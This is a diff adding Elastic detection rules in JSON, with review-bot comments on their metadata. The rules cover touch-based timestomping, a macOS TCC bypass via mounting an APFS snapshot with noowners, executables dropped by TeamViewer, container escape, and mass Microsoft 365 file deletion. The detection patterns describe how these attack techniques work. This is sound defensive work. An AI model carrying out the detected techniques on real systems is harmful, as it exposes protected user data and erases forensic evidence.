"ecs": true, + "name": "process.interactive", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.interactive", + "type": "boolean" + }, + { + "ecs": false, + "name": "user.Ext.real.id", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "afe6b0eb-dd9d-4922-b08a-1910124d524d", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\nSession View uses process data collected by the Elastic Defend integration, but this data is not always collected by default. Session View is available on enterprise subscription for versions 8.3 and above.\n#### To confirm that Session View data is enabled:\n- Go to \u201cManage \u2192 Policies\u201d, and edit one or more of your Elastic Defend integration policies.\n- Select the\u201d Policy settings\u201d tab, then scroll down to the \u201cLinux event collection\u201d section near the bottom.\n- Check the box for \u201cProcess events\u201d, and turn on the \u201cInclude session data\u201d toggle.\n- If you want to include file and network alerts in Session View, check the boxes for \u201cNetwork and File events\u201d.\n- If you want to enable terminal output capture, turn on the \u201cCapture terminal output\u201d toggle.\nFor more information about the additional fields collected when this setting is enabled and the usage of Session View for Analysis refer to the [helper guide](https://www.elastic.co/guide/en/security/current/session-view.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Domain: Container", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": 
"https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 5 + }, + "id": "afe6b0eb-dd9d-4922-b08a-1910124d524d_5", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_106.json b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_106.json new file mode 100644 index 00000000000..dc600914412 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b0046934-486e-462f-9487-0d4cf9e429c6_106.json 
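Review bot: The two fields that carry this rule's non-root condition, `user.Ext.real.id` and `group.Ext.real.id`, are declared in `required_fields` with `"ecs": false` and `"type": "unknown"`, so nothing in the file states what the query's `== "0"` comparisons are matched against. Worth confirming against the endpoint package mapping that both are keyword fields populated on exec events; if either is unmapped on a deployment, the `not ... == "0"` clauses may not evaluate as the non-root intent requires and the rule would silently change scope. Since JSON has no comment syntax, the expected type and source of these fields belong in the upstream rule's `setup` text rather than in this exported copy.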
@@ -0,0 +1,92 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Timestomping is an anti-forensics technique which is used to modify the timestamps of a file, often to mimic files that are in the same folder.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Timestomping using Touch Command", + "query": "process where event.type == \"start\" and\n process.name : \"touch\" and user.id != \"0\" and\n process.args : (\"-r\", \"-t\", \"-a*\",\"-m*\") and\n not process.args : (\n \"/usr/lib/go-*/bin/go\", \"/usr/lib/dracut/dracut-functions.sh\", \"/tmp/KSInstallAction.*/m/.patch/*\"\n) and not process.parent.name in (\"pmlogger_daily\", \"pmlogger_janitor\", \"systemd\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b0046934-486e-462f-9487-0d4cf9e429c6", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: 
Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1070", + "name": "Indicator Removal", + "reference": "https://attack.mitre.org/techniques/T1070/", + "subtechnique": [ + { + "id": "T1070.006", + "name": "Timestomp", + "reference": "https://attack.mitre.org/techniques/T1070/006/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 106 + }, + "id": "b0046934-486e-462f-9487-0d4cf9e429c6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_106.json b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_106.json new file mode 100644 index 00000000000..7079968d9de --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b00bcd89-000c-4425-b94c-716ef67762f6_106.json 
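Review bot: The query in this hunk does not constrain `host.os.type`, while the tags claim `OS: Linux` and `OS: macOS` and the sibling rules added in this commit (afe6b0eb and b00bcd89) pin the OS in the query; over `logs-endpoint.events.*` the filter presumably evaluates process starts from every platform, making the OS tags aspirational rather than enforced. The first query line could read `process where host.os.type in ("linux", "macos") and event.type == "start" and`, using the same `in` form the query already applies to `process.parent.name`. Separately, `index` lists `auditbeat-*` but `related_integrations` names only the endpoint package, so the beats path that the `setup` text describes is not reflected in the integration metadata. Both are fixes for the upstream rule source, as this file is an exported copy.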
@@ -0,0 +1,86 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies the use of the mount_apfs command to mount the entire file system through Apple File System (APFS) snapshots as read-only and with the noowners flag set. This action enables the adversary to access almost any file in the file system, including all user data and files protected by Apple\u2019s privacy framework (TCC).", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "TCC Bypass via Mounted APFS Snapshot Access", + "query": "event.category:process and host.os.type:macos and event.type:(start or process_started) and process.name:mount_apfs and\n process.args:(/System/Volumes/Data and noowners)\n", + "references": [ + "https://theevilbit.github.io/posts/cve_2020_9771/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 73, + "rule_id": "b00bcd89-000c-4425-b94c-716ef67762f6", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. 
Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a macOS System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, for MacOS it is recommended to select \"Traditional Endpoints\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/current/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", + "OS: macOS", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Use Case: Vulnerability", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1006", + "name": "Direct Volume Access", + "reference": "https://attack.mitre.org/techniques/T1006/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 106 + }, + "id": "b00bcd89-000c-4425-b94c-716ef67762f6_106", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110.json new file mode 100644 index 00000000000..ce78ddb3607 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110.json 
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable or script file remotely downloaded via a TeamViewer transfer session.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy via TeamViewer", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more 
details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + }, + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 110 + }, + "id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111.json b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111.json new file mode 100644 index 00000000000..00241666b6f --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111.json 
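Review bot: The `tags` array carries `Data Source: Elastic Endgame`, but `index` lists only `logs-endpoint.events.*`, so no Endgame index pattern feeds this rule and the tag overstates its coverage; either drop the tag or add an Endgame pattern such as `endgame-*` to `index` (the same mismatch is in the _111 copy, which narrows `index` further to `logs-endpoint.events.file-*`). The investigation guide in `note` also ends its account-compromise step with "after the registry modification", which reads as copied from a registry-focused rule; this rule fires on file creation, so `after the file creation` is the accurate wording. Both belong in the upstream rule source rather than in this exported file.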
@@ -0,0 +1,98 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies an executable or script file remotely downloaded via a TeamViewer transfer session.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.file-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Remote File Copy via TeamViewer", + "note": "## Triage and analysis\n\n### Investigating Remote File Copy via TeamViewer\n\nAttackers commonly transfer tooling or malware from external systems into a compromised environment using the command and control channel. However, they can also abuse legitimate utilities to drop these files.\n\nTeamViewer is a remote access and remote control tool used by helpdesks and system administrators to perform various support activities. It is also frequently used by attackers and scammers to deploy malware interactively and other malicious activities. This rule looks for the TeamViewer process creating files with suspicious extensions.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Contact the user to gather information about who and why was conducting the remote access.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Check whether the company uses TeamViewer for the support activities and if there is a support ticket related to this access.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT 
concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This mechanism can be used legitimately. Analysts can dismiss the alert if the company relies on TeamViewer to conduct remote access and the triage has not identified suspicious or malicious files.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. 
Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and process.name : \"TeamViewer.exe\" and\n file.extension : (\"exe\", \"dll\", \"scr\", \"com\", \"bat\", \"ps1\", \"vbs\", \"vbe\", \"js\", \"wsh\", \"hta\") and\n not \n (\n file.path : (\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Microsoft\\\\Windows\\\\INetCache\\\\*.js\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\TeamViewer\\\\update.exe\",\n \"?:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\?\\\\TeamViewer\\\\update.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "http://web.archive.org/web/20230329160957/https://blog.menasec.net/2019/11/hunting-for-suspicious-use-of.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more 
details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Command and Control", + "Resources: Investigation Guide", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0011", + "name": "Command and Control", + "reference": "https://attack.mitre.org/tactics/TA0011/" + }, + "technique": [ + { + "id": "T1105", + "name": "Ingress Tool Transfer", + "reference": "https://attack.mitre.org/techniques/T1105/" + }, + { + "id": "T1219", + "name": "Remote Access Software", + "reference": "https://attack.mitre.org/techniques/T1219/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b25a7df2-120a-4db2-bd3f-3e4b86b24bee_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_103.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_103.json new file mode 100644 index 00000000000..49188602516 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_103.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", + "false_positives": [ + "Users or System Administrator cleaning out folders." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Unusual Volume of File Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + "reference": "https://attack.mitre.org/tactics/TA0040/" + }, + "technique": [ + { + "id": "T1485", + "name": "Data Destruction", + "reference": "https://attack.mitre.org/techniques/T1485/" + } + ] 
+ } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "b2951150-658f-4a60-832f-a00d1e6c6745_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_105.json b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_105.json new file mode 100644 index 00000000000..a0ee4d60f05 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b2951150-658f-4a60-832f-a00d1e6c6745_105.json 
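Review bot: This file carries version 103 but its body is otherwise byte-identical to the `_105` and `_206` files added further down in this change, which suggests the historical versions are being regenerated from the current rule body rather than preserved as they shipped. If the package keeps historical versions so that already-installed rules can be matched and upgraded, a body that does not correspond to what version 103 actually contained defeats that purpose; please confirm against the upstream source that the older versions are meant to be exact copies. If they are not needed at all, dropping `_103` and `_105` avoids shipping three copies of the same query.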
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Austin Songer" + ], + "description": "Identifies that a user has deleted an unusually large volume of files as reported by Microsoft Cloud App Security.", + "false_positives": [ + "Users or System Administrator cleaning out folders." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Unusual Volume of File Deletion", + "note": "", + "query": "event.dataset:o365.audit and event.provider:SecurityComplianceCenter and event.category:web and event.action:\"Unusual volume of file deletion\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/cloud-app-security/anomaly-detection-policy", + "https://docs.microsoft.com/en-us/cloud-app-security/policy-template-reference" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b2951150-658f-4a60-832f-a00d1e6c6745", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Impact" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0040", + "name": "Impact", + 